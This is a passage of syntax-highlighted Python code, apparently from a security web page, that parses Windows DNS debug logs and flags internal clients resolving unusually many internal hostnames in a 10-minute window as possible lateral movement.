plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Parse Windows DNS debug log and extract client-&gt;hostname query pairs.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Pattern for DNS debug log query lines</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    query_pattern </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> re</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">compile</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}).*?UDP Rcv\\s+([\\d\\.]+)\\s+\\w+\\s+Q\\s+\\[\\w+\\s+\\w+\\s+\\w+\\]\\s+(\\w+)\\s+(.+)'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># client_ip -&gt; [(timestamp, hostname, query_type)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'r'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> encoding</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'utf-8'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> errors</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'replace'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            m </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> query_pattern</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">search</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> m</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            ts_str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_type</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> raw_hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> m</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">groups</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Only interested in internal clients querying internal names</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'172.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'192.168.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Clean up the hostname encoding (DNS wire format in debug log)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> raw_hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">replace</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'('</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">replace</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">')'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts_str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'%Y-%m-%d %H:%M:%S'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_type</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">detect_lateral_movement_patterns</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> internal_prefix</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'172.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'192.168.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Analyze query patterns for lateral movement indicators.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    findings </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_list </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sort by timestamp</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        query_list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find bursts: &gt;30 unique internal hostnames resolved in 10 minutes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        internal_queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> qt </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> query_list</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">any</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> s </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.corp.local'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.internal'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.lan'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">internal_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">10</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sliding 10-minute window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> i</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> _</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">enumerate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">internal_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                host </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> internal_queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">600</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 10 min window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            unique_hosts_in_window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">window</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> unique_hosts_in_window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MASS_INTERNAL_RESOLUTION'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">unique_hosts_in_window</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique internal hostnames in 10-minute window starting </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">start_ts</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" 